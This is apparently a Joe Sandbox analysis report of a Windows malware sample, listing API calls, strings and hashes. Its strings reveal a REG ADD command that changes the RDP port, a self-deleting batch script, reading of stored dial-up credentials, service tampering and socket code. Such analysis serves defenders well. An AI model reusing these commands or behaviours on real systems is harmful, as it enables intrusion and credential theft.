                                                                                              • Instruction Fuzzy Hash: 1181C0701483959AE310CF64CC80BABBBE6FFC9704F00491DF699972A1DBB49909CB5B
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcspn$strstr$strncpy$ExitThreadUserinet_addr$Sleepclosesocketgethostbynamehtonsprintfrandsendtosocketsrandtime
                                                                                              • String ID: %s:%d$http://
                                                                                              • API String ID: 3986318173-1702654977
                                                                                              • Opcode ID: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
                                                                                              • Instruction ID: 13eb3fa513dba6a830c19df937ef2a65af92b20ba7af4015ac3123da307f7ed1
                                                                                              • Opcode Fuzzy Hash: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
                                                                                              • Instruction Fuzzy Hash: BD81F3325043155BE704DF748C84AAB7AEAEFC9350F044A1DFA5697290EFB4DE08C795
                                                                                              APIs
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010CF2
                                                                                              • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010D07
                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10010D29
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010D4A
                                                                                              • Sleep.KERNEL32(00000320), ref: 10010D5D
                                                                                              • DeleteService.ADVAPI32(00000000), ref: 10010D64
                                                                                              • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 10010DCB
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E1C
                                                                                              • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E33
                                                                                              • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010E48
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 10010E4F
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E61
                                                                                              • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E78
                                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 10010E89
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010EAE
                                                                                              • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010EC5
                                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 10010ED6
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010EFB
                                                                                              • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F12
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010F28
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F2F
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010F3E
                                                                                              • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F51
                                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 10010F5E
                                                                                              • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10010F7B
                                                                                              • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10010F82
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F89
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F90
                                                                                              • Sleep.KERNEL32(000001F4), ref: 10010F9B
                                                                                              Strings
                                                                                              • SYSTEM\CurrentControlSet\Services\, xrefs: 10010D70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$Open$Manager$CloseDatabaseHandle$Lock$ControlDeleteSleep$ChangeConfigQueryStartStatusUnlock
                                                                                              • String ID: SYSTEM\CurrentControlSet\Services\
                                                                                              • API String ID: 1632965242-3886778518
                                                                                              • Opcode ID: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
                                                                                              • Instruction ID: 7f1d72a6b6236b21d302d541352c045c2c8a2f4db1f642aaa59284ae598933f1
                                                                                              • Opcode Fuzzy Hash: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
                                                                                              • Instruction Fuzzy Hash: F3712F31744365AFF731CB644C8AFBE76A5EB44B51F100228FA59AB2D0DFF08C858A60
                                                                                              APIs
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000105), ref: 100074C9
                                                                                              • strchr.MSVCRT ref: 100074DE
                                                                                              • lstrcpy.KERNEL32(00000001), ref: 100074E9
                                                                                              • lstrcat.KERNEL32(?,?), ref: 10007501
                                                                                              • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10007510
                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10007520
                                                                                              • wsprintfA.USER32 ref: 10007540
                                                                                              • GetVersionExA.KERNEL32 ref: 1000756C
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10007592
                                                                                              • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,?), ref: 100075C8
                                                                                              • GetPrivateProfileStringA.KERNEL32(00000000,DialParamsUID,00000000,?,00000100,?), ref: 10007645
                                                                                              • lstrcmp.KERNEL32(?,00000000), ref: 1000766A
                                                                                              • lstrcpy.KERNEL32(?,00000200), ref: 100076A5
                                                                                              • lstrcpy.KERNEL32(?,00000100), ref: 100076BA
                                                                                              • GetPrivateProfileStringA.KERNEL32(00000000,PhoneNumber,00000000,?,00000100,?), ref: 100076EE
                                                                                              • GetPrivateProfileStringA.KERNEL32(00000000,Device,00000000,?,00000100,?), ref: 10007706
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007755
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 1000775B
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007761
                                                                                              • lstrlen.KERNEL32(00000000,?,00000000,?,?), ref: 1000776A
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000779D
                                                                                                • Part of subcall function 100073D0: wsprintfA.USER32 ref: 1000743C
                                                                                                • Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 1000746A
                                                                                                • Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 10007494
                                                                                              Strings
                                                                                              • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000750A
                                                                                              • Device, xrefs: 10007700
                                                                                              • %s\%s, xrefs: 1000753A
                                                                                              • DialParamsUID, xrefs: 1000763F
                                                                                              • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000752D
                                                                                              • PhoneNumber, xrefs: 100076E8
                                                                                              • Documents and Settings\, xrefs: 100074CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@PrivateProfile$Stringlstrcpy$FreeMemorylstrcatwsprintf$??2@DirectoryFolderNamesPathSectionSpecialVersionWindowslstrcmplstrlenstrchr
                                                                                              • String ID: %s\%s$Device$DialParamsUID$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$PhoneNumber$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                                                                                              • API String ID: 4167786638-3033193607
                                                                                              • Opcode ID: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
                                                                                              • Instruction ID: f0af7ff8ab0846974cf933d747a26daa36609d74f32ab5fd33a69faa2bd6b488
                                                                                              • Opcode Fuzzy Hash: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
                                                                                              • Instruction Fuzzy Hash: 4E8180B1504385AFE724CF14CC84FABB3E9FBC4740F004A1DF68A97251DB79A9458B66
                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32 ref: 100121A0
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000040), ref: 100121D0
                                                                                              • RegEnumKeyExA.ADVAPI32(00000040,00000000,?,?,00000000,00000000,00000000,00000000), ref: 100121F6
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 10012320
                                                                                              • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,00000007,00000007,?), ref: 1001234F
                                                                                              • RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000007,?,00000001), ref: 1001236F
                                                                                              • strstr.MSVCRT ref: 100123F4
                                                                                              • strstr.MSVCRT ref: 1001240B
                                                                                              • lstrlen.KERNEL32(?), ref: 10012420
                                                                                              • lstrlen.KERNEL32(?), ref: 10012429
                                                                                              • LocalSize.KERNEL32(00000000), ref: 10012437
                                                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 10012445
                                                                                              • lstrlen.KERNEL32(?), ref: 10012456
                                                                                              • lstrlen.KERNEL32(?), ref: 10012474
                                                                                              • lstrlen.KERNEL32(?), ref: 10012486
                                                                                              • lstrlen.KERNEL32(?), ref: 100124AF
                                                                                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 1001251F
                                                                                              • RegCloseKey.ADVAPI32(00000040), ref: 10012536
                                                                                              • LocalReAlloc.KERNEL32(00000000,00010000,00000042), ref: 10012544
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrlen$Local$Alloc$EnumOpenQueryValuestrstr$CloseSize
                                                                                              • String ID: DisplayName$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$Windows
                                                                                              • API String ID: 2254360075-2665300987
                                                                                              • Opcode ID: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
                                                                                              • Instruction ID: 0094e60b34b218b2d156cdba79d742c6c5f7379f88ed07e575cc6fad288f1158
                                                                                              • Opcode Fuzzy Hash: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
                                                                                              • Instruction Fuzzy Hash: B2B1D6B16043855BD715CF24CC90BABB7DAEFC8310F444A1DFA9997280EAB4EE49C751
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000CD25
                                                                                              • lstrcpy.KERNEL32(00000000,@echo off), ref: 1000CD38
                                                                                              • lstrcat.KERNEL32(00000000,@del 3596799a1543bc9f.aqq), ref: 1000CD56
                                                                                              • lstrcat.KERNEL32(00000000,@del "), ref: 1000CD68
                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 1000CD77
                                                                                              • lstrcat.KERNEL32(00000000,"), ref: 1000CD86
                                                                                              • lstrcat.KERNEL32(00000000,@del ), ref: 1000CD95
                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 1000CDA4
                                                                                              • lstrcat.KERNEL32(00000000,@exit), ref: 1000CDB3
                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 1000CDC9
                                                                                              • WriteFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 1000CDE6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000CDED
                                                                                              • WinExec.KERNEL32(?,00000000), ref: 1000CDFA
                                                                                              • ExitProcess.KERNEL32 ref: 1000CE02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrcat$File$CloseCreateExecExitHandleModuleNameProcessWritelstrcpy
                                                                                              • String ID: @exit$"$@del $@del "$@del 3596799a1543bc9f.aqq$@echo off$afc9fe2f418b00a0.bat
                                                                                              • API String ID: 433470039-873414491
                                                                                              • Opcode ID: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
                                                                                              • Instruction ID: 0a7f92bd5935df41e05b6577e6ab9151d6494e46dd2793a7553bbccc7f6feb7a
                                                                                              • Opcode Fuzzy Hash: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
                                                                                              • Instruction Fuzzy Hash: 15419072519790ABEB11CB60CCC5FD67BA9EF8A310F044D98E6845F044DB74B628CB93
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcspn$strstr$strncpy$ExitSleepThreadUseratoi
                                                                                              • String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                                                                                              • API String ID: 3047203434-1551478559
                                                                                              • Opcode ID: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
                                                                                              • Instruction ID: 1c951fb19393ce52af4e69efaf2d32add5348a8144f4b5db51f252c0556f43f7
                                                                                              • Opcode Fuzzy Hash: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
                                                                                              • Instruction Fuzzy Hash: 715127325102601BD704DAB48C409DF7B9AEFC6250F02461DFA9697190DE68EA4987EA
                                                                                              APIs
                                                                                              • LoadCursorA.USER32(00000000,00000000), ref: 1000FC53
                                                                                                • Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
                                                                                                • Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
                                                                                                • Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D
                                                                                              • GetDesktopWindow.USER32 ref: 1000FCA2
                                                                                              • GetDC.USER32(00000000), ref: 1000FCAF
                                                                                              • GetTickCount.KERNEL32 ref: 1000FCC3
                                                                                              • GetSystemMetrics.USER32(00000000), ref: 1000FCED
                                                                                              • GetSystemMetrics.USER32(00000001), ref: 1000FCF4
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 1000FD12
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 1000FD1B
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1000FD24
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1000FD2A
                                                                                              • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 1000FD89
                                                                                              • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 1000FD9A
                                                                                              • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 1000FDAE
                                                                                              • SelectObject.GDI32(?,?), ref: 1000FDC4
                                                                                              • SelectObject.GDI32(?,?), ref: 1000FDCE
                                                                                              • SelectObject.GDI32(?,?), ref: 1000FDDE
                                                                                              • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 1000FDEE
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000002), ref: 1000FDFD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$??2@CountCursorLoadRectReleaseTick
                                                                                              • String ID: I=u
                                                                                              • API String ID: 339399666-3032091488
                                                                                              • Opcode ID: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
                                                                                              • Instruction ID: 3f0a5bb4dce6945fbb730085926d6daddf735a738384ac0d5d646b014a7e3649
                                                                                              • Opcode Fuzzy Hash: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
                                                                                              • Instruction Fuzzy Hash: 6681E3B0504B459FE320CF69C884A27FBE9FB88704F004A1DE59A87B50DBB9F8458F91
                                                                                              APIs
                                                                                                • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,00000001), ref: 100091B1
                                                                                              • lstrcat.KERNEL32(?,rar.exe), ref: 100091ED
                                                                                              • PathIsDirectoryA.SHLWAPI(?), ref: 100091F0
                                                                                              • lstrcpy.KERNEL32(?,?), ref: 10009209
                                                                                              • lstrcat.KERNEL32(?,.rar), ref: 10009218
                                                                                              • lstrcpy.KERNEL32(?,?), ref: 10009220
                                                                                              • lstrcat.KERNEL32(?,1007A0CC), ref: 1000922C
                                                                                              • wsprintfA.USER32 ref: 10009248
                                                                                              • lstrcpy.KERNEL32(?,?), ref: 1000926C
                                                                                              • PathRemoveExtensionA.SHLWAPI(?,?,?,?,?,?,?,00000001), ref: 10009277
                                                                                              • lstrcat.KERNEL32(?,.rar), ref: 10009287
                                                                                              • wsprintfA.USER32 ref: 1000929C
                                                                                              • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 100092C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrcat$lstrcpy$Pathwsprintf$DirectoryExecuteExtensionOpenRemoveShelllstrlen
                                                                                              • String ID: .rar$WinRAR\shell\open\command$a %s %s$a -r %s %s$open$rar.exe
                                                                                              • API String ID: 1594156495-1032977547
                                                                                              • Opcode ID: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
                                                                                              • Instruction ID: afa0eefc70f7be5220eaeba01fbc78bff8034a503fb8c3defdcf7e753fe2bb58
                                                                                              • Opcode Fuzzy Hash: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
                                                                                              • Instruction Fuzzy Hash: A64162B2104399AEE724DBA0CC84FEB77ADEBD4704F008D1CF785A7140DA74A609CB66
                                                                                              APIs
                                                                                              • malloc.MSVCRT ref: 1000B44D
                                                                                              • atoi.MSVCRT(?), ref: 1000B46C
                                                                                              • CreateFileA.KERNEL32(c:\3389.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000B4A0
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B530
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B54C
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 1000B570
                                                                                              Strings
                                                                                              • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B577
                                                                                              • /f , xrefs: 1000B4D3, 1000B5AA
                                                                                              • del %0, xrefs: 1000B630
                                                                                              • C:\3389.bat, xrefs: 1000B68A
                                                                                              • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B4AB
                                                                                              • c:\3389.bat, xrefs: 1000B49B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Write$Createatoimalloc
                                                                                              • String ID: /f $C:\3389.bat$REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d $REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d $c:\3389.bat$del %0
                                                                                              • API String ID: 664794413-4273509073
                                                                                              • Opcode ID: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
                                                                                              • Instruction ID: fb98ae05d316c3fd0aebd7eca0209f5c260241d4b25d467fdc2f7558c52bb64f
                                                                                              • Opcode Fuzzy Hash: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
                                                                                              • Instruction Fuzzy Hash: B961B2721147846AE324CB74CC45BFB77E9EBC8310F104E2DF796932D1DAB9AA088B55
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D68F
                                                                                              • GetProcAddress.KERNEL32(00000000,socket), ref: 1000D6A3
                                                                                              • GetProcAddress.KERNEL32(00000000,recv), ref: 1000D6AF
                                                                                              • GetProcAddress.KERNEL32(00000000,connect), ref: 1000D6BB
                                                                                              • GetProcAddress.KERNEL32(00000000,getsockname), ref: 1000D6C7
                                                                                              • GetProcAddress.KERNEL32(00000000,select), ref: 1000D6D3
                                                                                              • GetLastError.KERNEL32(00000000), ref: 1000D6F0
                                                                                              • GetLastError.KERNEL32(00000000), ref: 1000D740
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
